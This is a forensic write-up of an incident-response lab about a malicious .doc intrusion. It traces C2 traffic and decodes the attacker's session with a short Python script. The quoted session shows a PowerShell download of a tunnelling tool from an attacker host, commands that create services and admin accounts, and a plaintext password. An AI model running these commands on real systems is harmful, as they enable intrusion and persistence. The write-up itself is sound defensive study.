This challenge focuses on analyzing Sysmon Logs, Windows Event Logs, and Packet Captures. The following is a list of different tools for viewing the data:
Endpoint Log Tools
EctxEcmd: CLI tool which parses Windows Event Logs into different formats
Timeline Explorer: GUI tool that functions as a data filtering and navigating application
Open csv files produced by "EctxEcmd"
SysmonView: Windows GUI to visualize Sysmon Logs
Uses xml files produced by "Event Viewer"
Event Viewer: Windows GUI to view Windows Event Logs and Sysmon Logs
Action > Save All Events As... > XML
Network Logs
Wireshark
Brim
Tempest Incident - Initial Access
Malicious Document
The following is essential information generated by the CRITICAL alert caused by a malicious document:
The malicious document has a .doc extension
The user downloaded the malicious document via chrome.exe
The malicious document then executed a chain of commands to attain code execution
Using the Timeline Explorer and searching for the string ".doc", 13 events are found relating to the malicious document. One in particular provides a large amount of information:
It's also possible to use SysmonView to interpret the events happening on processes like chrome.exe or WinWord.exe.
Name of document: free_magicules.doc
Name of machine: TEMPEST
Name of user: benimaru
PID of Microsoft Process: 496
A quick search on the capture.pcap in Wireshark also shows that the IP and website name are 167.71.199.191 and hxxp[://]phishteam[.]xyz (defanged form). Searching further, using the PID found (496) to search in Timeline Explorer, some interesting executable information is found:
To get the full path, use the command gci env: to get the environment variables, specifically APPDATA. This is C:\Users\user\AppData\Roaming\, but for user Benimaru, the "user" would be replaced with "Benimaru". Combining the variable with the rest of path simplifies the path to C:\Users\Benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.zip. This can also be found by searching "update.zip" in the Timeline Explorer and looking at Payload Data4.
The file is placed in the "Startup" folder. The Autostart execution reflects explorer.exe as its parent process ID, so child processes of explorer.exe within the event timeframe could be significant. Any process creation (Event ID 1) or File Creation (Event ID 11) succeeding the document execution are worth checking. Searching on Timeline Explorer for events relating to that parent process shows the following executable info:
The file "first.exe" is likely the malicious binary for stage 2 execution. Searching for "first.exe" shows a number of commands run involving the file:
Investigating the payload of C:\Users\Public\Downloads\first.exe shows the hashes provided with the binaries.
SHA256 for first.exe: CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8
C2 Server: http://resolvecyber.xyz:80/
Malicious Document Traffic
The C2 server has the following information:
IP and Port: 167.71.222.162:80
DNS Query: resolvecyber.xyz
This information can help create the following filter to look at all the communication going to the C2, specifically the encoded requests: (ip.dst == 167.71.222.162 and ip.src == 192.168.254.107) and http
C2 Encoding: Base64
C2 Parameter: q
C2 URL Path: /9ab62b5
C2 HTTP Method: GET
C2 Programming Language: Nim
Discovery - Internal Reconnaissance
Going back to the C2 communication, I wanted to see what commands and responses were going through. The first step is to get the queries in one file. I used the following filter: (ip.dst == 167.71.222.162 and ip.src == 192.168.254.107) and http.request.uri contains "q". Then I exported packet dissections as plain text with only the packet summary line to quarantine the query line.
Using a simple python script, the decoded base64 strings could be extracted. The following is the script I wrote:
import base64
base64_list = []
# Isolates base64 in each summary line
with open("export.txt", "r") as f:
for line in f.readlines():
# Splits based on spaces to get parameter
line = line.split()[7][11:]
base64_list.append(line)
# Decodes base4 and outputs to file
with open("decoded.txt", "w") as f:
for line in base64_list:
decoded = base64.b64decode(line).decode("utf-8")
f.write(decoded)
It can also be done easily in bash as well using sed and awk:
The following text file is the output which features the session the attacker had to create new users and persistence:
whoami - tempest\benimaru
pwd -
Path
----
C:\Windows\system32
dir C:\Users -
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/20/2022 9:06 PM benimaru
d-r--- 6/20/2022 4:03 PM Public
d----- 6/20/2022 11:52 PM rimuru
net users -
User accounts for \\TEMPEST
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed successfully.
net localgroup administrators - Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.
net user benimaru - User name benimaru
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2022 9:18:04 PM
Password expires Never
Password changeable 6/20/2022 9:18:04 PM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/21/2022 1:14:49 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
dir C:\Users\benimaru -
Directory: C:\Users\benimaru
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 6/20/2022 4:13 PM 3D Objects
d-r--- 6/20/2022 4:13 PM Contacts
d-r--- 6/21/2022 12:27 AM Desktop
d-r--- 6/20/2022 9:20 PM Documents
d-r--- 6/21/2022 1:13 AM Downloads
d-r--- 6/20/2022 4:13 PM Favorites
d-r--- 6/20/2022 4:13 PM Links
d-r--- 6/20/2022 4:13 PM Music
dar--- 6/21/2022 1:15 AM OneDrive
d-r--- 6/20/2022 4:13 PM Pictures
d-r--- 6/20/2022 4:13 PM Saved Games
d-r--- 6/20/2022 4:13 PM Searches
d-r--- 6/20/2022 5:57 PM Videos
dir C:\Users\benimaru\documents - dir C:\users\benimaru\Desktop -
Directory: C:\users\benimaru\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/20/2022 11:34 PM 268 automation.ps1
-a---- 6/20/2022 4:13 PM 1446 Microsoft Edge.lnk
cat C:\Users\Benimaru\Desktop\automation.ps1 - $user = "TEMPEST\benimaru"
$pass = "infernotempest"
$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
## TODO: Automate easy tasks to hack working hours
netstat -ano -p tcp -
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5508
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 4964
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1212
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1760
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2424
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 624
TCP 0.0.0.0:49676 0.0.0.0:0 LISTENING 608
TCP 192.168.254.107:139 0.0.0.0:0 LISTENING 4
TCP 192.168.254.107:51802 52.139.250.253:443 ESTABLISHED 3216
TCP 192.168.254.107:51839 34.104.35.123:80 TIME_WAIT 0
TCP 192.168.254.107:51858 104.101.22.128:80 TIME_WAIT 0
TCP 192.168.254.107:51860 20.205.146.149:443 TIME_WAIT 0
TCP 192.168.254.107:51861 204.79.197.200:443 ESTABLISHED 4352
TCP 192.168.254.107:51871 20.190.144.169:443 TIME_WAIT 0
TCP 192.168.254.107:51876 52.178.17.2:443 ESTABLISHED 4388
TCP 192.168.254.107:51878 20.60.178.36:443 ESTABLISHED 4388
TCP 192.168.254.107:51881 52.109.124.115:443 ESTABLISHED 4388
TCP 192.168.254.107:51882 52.139.154.55:443 ESTABLISHED 4388
TCP 192.168.254.107:51884 40.119.211.203:443 ESTABLISHED 4388
TCP 192.168.254.107:51895 52.152.90.172:443 ESTABLISHED 5508
TCP 192.168.254.107:51896 20.44.229.112:443 ESTABLISHED 8904
powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe - dir C:\Users\benimaru\Downloads\ch.exe -
Directory: C:\Users\benimaru\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2022 1:17 AM 8230912 ch.exe
whoami - nt authority\system
pwd -
Path
----
C:\Windows\system32
net user shuna princess - net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
net user shuna - net user shuna pr1nc3ss! - net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
net user shion m4st3rch3f! - net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
net user Administrator ch4ng3dpassword! - The command completed successfully.
cmd.exe /c net user shion m4st3rch3f!!! - net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
whoami /priv -
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Isc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService FAILED 1073:
The specified service already exists.
sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService SUCCESS
sc.exe qc TempestUpdate2 - [SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TempestUpdate2
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\final.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TempestUpdate2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
net user /add shuna princess - The command completed successfully.
net user /add shion m4st3rch3f! - The command completed successfully.
net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru shion
shuna WDAGUtilityAccount
The command completed with one or more errors.
net localgroup administrators /add shion - The command completed successfully.
net localgroup administrators - Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.
Password Discovered: infernotempest
Listening Port Remote Shell: 5985 (WinRM)
After enumerating the listening ports, the attacker establishs a reverse socks proxy to access the internal services. The command they use first is powershell iwr http://phishteam.xyz/02dcf07/ch.exe which downloads a file called ch.exe. Searching this file in Timeline Explorer shows how the attacker used the process.
Doing a search of the hash on VirusTotal gives a return on the binary known as "chisel". Chisel is a fast tunnel transported over HTTP, secured via SSH. It's a single executable that works as both a client and server.
One of the following processes has the execution command: C:\Windows\system32\wsmprovhost.exe -Embedding. This is a process that hosts an active remote session on a target. It is a plugin for the host process WinRM. This was most likely the service used to authenticate to get privilege escalation.
The output from the decoded base64 shows a number of useful things for this section:
New Users Created: shion, shuna
Missing Option: /add
Command to add administrator:
net localgroup administrators /add shion
This payload belongs to an exploit called [Folina](), which leverages remote templates to execute a PowerShell payload using the "ms-msdt" MSProtocol URI scheme. A successful attack results in a remote, unauthenticated attacker taking control of an affected system.
